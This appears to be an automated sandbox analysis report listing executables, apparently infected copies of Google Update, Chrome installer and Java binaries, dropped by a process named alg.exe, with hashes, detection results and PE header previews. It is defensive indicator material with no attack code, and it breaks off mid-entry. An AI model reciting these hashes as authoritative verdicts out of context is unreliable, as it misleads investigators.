                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1437696
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.7061296295210795
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:uLCKAB7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:uuKk7LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:BD34CFD774C2E9969B331EF163C90C08
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FFBC230E3567E1161B353335C20857FDD3695E81
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:027D2BAF1EF044CB0E7ED197DCE61E406E5AED0EEA622A5E0900331939469DB1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C1BD6E566792F7D00B89A4A173233A91DF361803AA8EFC133959C90FB6034FC711E3E97C99BEAE231027E4B7AA9FB2FCFDA1D54A339B4572F2C5D2FAA903315C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@........................... .....*v......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...p...........@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1383936
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686246032860551
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ojNWBP8/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:qNmkLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4EBC2871EA6DF045F35295BB8BDE223F
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AFE8083A2799DD8C56FD787C9D7829FABFABFD7E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C801710C3CADC12E402B0161918ACA8F5EC44B753C50F76A3C33E243BC905ACC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:56BCE973E67687CD3B7D2308623EE4CA71833AF42DAFD8C1D1A95AC31C92D3C724E834751A520918F2683F99A0B7C95E39B579003EAC0DDB43ABDFFD02539A10
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@........................... .....Zp.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1458176
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.782547317458016
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:Ui5RyhdsRr2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Ui5soR2LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:9123098BDB34E36E4383AF3B191B3A1E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A6245CA86403BFEBD386578A64CA649D9984B2BC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EB7FFB951443D8DFABCC324ED4F02F2339C3C494EE3E3C52300934DF5B91A854
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:52437AD0B361F370561C3359D7C46E8A3DC0221075D2CFC16300BED32786D806D766CC66B20B51AE1983D0B3E5BC9E8975DD322BC3C94DE9C698C6B58632F18A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@..............................!........... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...`... ......................@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1498112
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.90027324526919
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:V1qDmRF+wpx/QafF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8mRF+wn/JfFLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:5E10417FCE568CEC42FF5FD918F27EDA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CE6A51A7AE24ADCF412CDE2EB292A0BAF143E3D5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:623D93C746BA0CAC40217E886B0345C96A4E2C66C854E6CBC9F0AB0B7C9B3CAB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:61870F7C120CD19B2AD9666E0BD2121E065B21D67C0B804D4EB9F8DFD3C59AEA48164931947AEE5CFC795708F4CF83F253C3D39A1A5470B7E574D4CCBFDA2BD0
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@...........................!.....e................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc.......p......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1383936
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686211896366928
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:kE21BPn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:t2b/LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FB0C4B31713C807CD5B33D505382EE30
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0A457A45975525886BBD225420451D1C322C234E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E0B4B275CB7B9457080F4E73F2952CB3C7E42958308E004305B08540F3F7C456
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:294C83EB1912AE72780EF58C17CB687BE291E8DA391B131542B92BC21433040B3E23B068578895335FFC6ADDBF564E974C7DAD9B1B5EE07199A898F4721FB3F5
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@........................... .....t........................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):105669632
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999989130532201
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3145728:iLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:wBWx/pt8U7E6aZRfIICU
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8DFBCFABB8C16333B96F2EC1ABEE511B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E448C2EE0C42F9D6DBA0F29BAC9C152366240DE8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:93902548B7D635602B68B6679FFB4D919AE05486D07A92164BB88E22295F7F48
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:06E70D5AD6EE5E0677FAA9D896A881D98FE80BEA84A3253596A05F248E63A42CA7DED31FA86BA246F2FC5F30A42DF369C18A99378CD00C38C7322F19A2AA3B3C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.......L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1313792
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5735125303192365
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:H3iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:HD/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:88708B8AB2378DF3BD44F94ED303E9FE
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:ED070F665C8833FD7EF632C444CCE82DF8969042
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0FCEB7F1B7CC1716F680B8BAC673A1DF102F73B0A61E7853B0338D755A1F9937
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C4863DA157A59EE039B663BC5A1B46839F63612131040A735DE07CD45BA17C0426C5EB0B220761323653CE7429A5219B24B554FA7AD66FE9DD514F7F7EE6FFBC
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................#z......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...`...........l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.534724974486976
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:xCKiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:sM/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:700399AB02D32123ED06A3BABA1F6F80
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:323FC6FFAC257122960D3DF0A4C6C9A6406E7F57
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:45D51303745AE5F7E272D5F0FEDE83A194B0D1A5F527DB567BC49C7D1CF948CC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7969C06880A9C877FEC14611F578921C07CD572FD6E1792BF8EA0A2A487A58D35FF5488FC4AD496E2388F883E27B2691C4D433AC403D7DB84C08F983BE2A4EEA
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1530880
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.999576252396631
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:NcwOtO7t/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:NhOtmtLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:58E7A48C77DBDB2DF81C3DF7726226BB
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5FB86CCC0491A1C80A98D8DB38DBB659C44D2F11
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9F31A02ED1D64073A375CF8371E0D864F22F62005A161C36B22B3D9738CF71B3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9E97B0CB507BCFDAF5B9875FF598A456A19E3BF1D136109D340FB229AD1F495980CF516AF04FC84983951FD76A94F46BDE531EDE31C66FAD8AE2125219073EF7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P".....^........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1368064
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.641313733467025
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:I14/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:IOLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2DD44610A141FB679F2BBF83ED7EEC5B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:188D8B8420DF2263309D6A8AB11961F46CA8D0C3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:E56FD604FBB9B20853C5BF9FB0CFB66E0E80E039E620A715432023DBDA854965
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:93F13827F280960B2AACF114883C1745024290B58FFB9760346557D8A19B116A0D12C0E1F5AD44FB00137D49401077BF0ED1C0DFD868D6E28689A0E2E40F58D7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1530880
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.000274837079589
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:0fU/h/4KK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0M/VKLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E611C76C552A12C491810C88085FCEF1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A606345208D02BBB2120940F7B5DD434A838FF87
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D1AD72694FC3AE12E2A137D2F3CC988959ABAC6D208A0E753BB2A02F0A9753AF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:628E7F3C91B05316631B274859DD217512719DB5D9CEA2BF88175296A1C7609B5093965FA572B321773A0B42B010B9509E2F3B1D27169BE0A1B7B0C9AAB1E36E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P".............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1669632
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.073452887456132
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:vx7NiBLZ05jNTmJWExR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vxZiHIjNgRLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4C5DCA4B4450ED934451BBEE13775F88
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F1E72DAA3D86A3306D199D1943AADF3679564D52
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5281057ECD8D0B3B9588603AFDCF89C4E8DF01924095B29062A681A0E11DD133
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2AB0C5E753ABCC9128205D7DD3A851436591220BB24910C125DE8C0C7CE79EA4EB9C28011F4A5B0DA41D799C232950C97DD68DE46658491C6DA9CF258598DA93
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%.................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1297920
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.535156074908879
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:oPr6iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:M4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:E97F12D6959DD245B941E4255FAE969A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AAFEAD36423D9E8BDC95B614F95E2317C20C0291
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A36618A802979EDBD52EDABBB51A18DC598B147B5A7DBAF7476E212476F5CBE1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:79C041A76CFD6F1A3BDFE27A9E22496D73AC6DD077A52858E61A60E45FEFB6058360641EBE9C092C9938A9C307D8EF1254C1B53B1C1C53292AAD6FEF031C01C2
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1397760
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.700535451669368
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:EdP/P/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:83LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A73C9099D01145B208475B17AC3B8627
